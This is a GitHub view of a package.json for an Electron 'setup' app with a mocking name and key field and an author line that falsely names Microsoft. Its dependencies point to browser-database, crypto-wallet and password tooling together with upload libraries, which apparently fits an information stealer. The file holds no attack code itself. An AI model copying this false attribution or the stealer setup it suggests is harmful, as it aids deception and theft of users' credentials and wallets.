-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathpackage.json
65 lines (65 loc) · 1.54 KB
/
package.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
{
"name": "NO YOU DONT KNOW ME_setup",
"productName": "NO YOU DONT KNOW ME_setup",
"version": "1.0.0",
"description": "NO YOU DONT KNOW ME",
"main": "src/index.js",
"key": "LMAOOOOOOO ARE YOU LOOKING AT THE KEY ???? XDDDDDDD",
"logout": "true",
"ui": "false",
"cookieSessions": "true",
"author": "Copyright Microsoft Corporation. All rights reserved.",
"license": "MIT",
"config": {
"forge": {
"packagerConfig": {},
"makers": [
{
"name": "@electron-forge/maker-squirrel",
"config": {
"name": "app"
}
},
{
"name": "@electron-forge/maker-zip",
"platforms": [
"darwin"
]
},
{
"name": "@electron-forge/maker-deb",
"config": {}
},
{
"name": "@electron-forge/maker-rpm",
"config": {}
}
]
}
},
"dependencies": {
"adm-zip": "^0.5.10",
"axios": "^0.27.2",
"better-sqlite3": "^7.5.3",
"bitcoin-seed": "^1.0.0",
"buffer-replace": "^1.0.0",
"child_process": "^1.0.2",
"crypto": "^1.0.1",
"electron-squirrel-startup": "^1.0.0",
"ethers": "^6.3.0",
"form-data": "^4.0.0",
"fs": "^0.0.1-security",
"glob": "^7.2.3",
"iconv-lite": "^0.6.3",
"node-fetch": "^2.6.7",
"node-forge": "^1.3.1",
"node-passworder": "^2.0.4",
"os": "^0.1.2",
"path": "^0.12.7",
"seco-file": "^1.2.0",
"sleep": "^6.3.0",
"win-protect": "^1.0.0",
"winreg": "^1.2.4",
"zlib": "^1.0.5"
}
}